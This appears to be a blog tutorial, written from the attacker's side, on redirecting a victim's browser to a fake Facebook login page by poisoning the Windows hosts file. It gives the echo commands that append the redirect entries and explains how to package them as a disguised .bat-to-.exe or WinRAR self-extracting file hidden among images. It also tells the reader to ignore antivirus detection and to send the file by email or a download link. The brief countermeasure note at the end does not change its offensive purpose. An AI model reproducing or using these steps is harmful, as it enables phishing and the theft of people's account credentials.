Intro:
Whenever we type a URL in the address bar of browser, what it will do is, it will first check the system hosts file located in C:\Windows\System32\drivers\etc\, if the domain name is there or not. If the respective domain name is found then it compares the IP address in the corresponding field and direct the page to the corresponding IP address.
Now consider a situation where an attacker edit the hosts file and give the IP address of his(attacker) PC for facebook.com, now whenever the victim will type the facebook.com the page will be redirected to attackers IP address. The only thing the attacker have to do is setup a phishing page in its server.
Click here to know how to make your PC a web server.
Steps to perform the attack:
1.Create a phishing page in your PC(server). 2.Create a modified hosts file.
3.Hide the file inside some media(like image).
4.Deliver the image(consisting of hosts file) to the victim.
Now the phishing page has to be upload in certain website, but unfortunetly an IP address can only point to the server not to a website , so the only possible solution is make your PC a webserver, Click Here to know how to make your PC a web server.
STEP-2:-
In this step we have to modify the host file as per our need. In this article I will be explaining two methods to modify the victims hosts file.
Method-1:- Before we start,lets have a look, how "hosts" file actually looks like.
Now, the first thing you have to do is, know your public IP address, go to cmd prompt and type"ipconfig" hit enter. Note your IP address.
Open the hosts file(located in:C:\WINDOWS\system32\drivers\etc) with notepad. To edit the file check the image below.
Check the last two lines which I have added, now whenever a victim types facebook.com or www.facebook.com the phishing page saved in the IP 115.242.243.20(Replace this with your IP) will open which is definitely not a facebook login page.
Okay, we can now easily change the hosts file located in our PC. But the challenge is how to change the victim's hosts file.Don't worry, its not a big deal, lets see how to do it:
First of all modify the hosts file as described above and save it with name "hosts" please do not use any extension. Right click the file and select add to Archive(you must have Winrar installed in your PC).
Follow the images for further instruction:
Settings under "General Tab":
Settings under "Advanced Tab":
Goto General tab inside advanced SFX options:
Now select Update tab:
Select the "Modes" Tab:
Press OK and you are done...Remember sometimes antivirus may detect it as malware in that case ignore it or select No Action.
1.Open notepad
2.Copy and paste the following code in notepad.
echo "IP address" www.facebook.com >> C:\windows\system32\drivers\etc\hosts
echo your "IP address" facebook.com >> C:\windows\system32\drivers\etc\hosts
Note:-Enter Your IP address without quotes.
(It will append the IP address and the respective URL at the bottom of the hosts file)
3.Save it with any name with .bat extension.4.Convert this .bat file into .exe file using bat to exe converter, click here to download
STEP-3:-
STEP-4:-
Before delivering the files to victim archieve those files(image and exe) with winrar, try including more images in the archieve not just your exe file and one image.
Now the only question left is, How do we deliver this file to victim? You can send it through email or upload the archieve in the website and give the download link to the victim.
Drawback:
The only major drawback of this technique is that most of us have dynamic IP address which keeps changing. That means till the victim does'nt logon you can not shutdown your internet connection.
Countermeasure:
1.Check whether the connection is https or http 2.Be suspicion for those website whose certificates are not valid.
No comments:
Post a Comment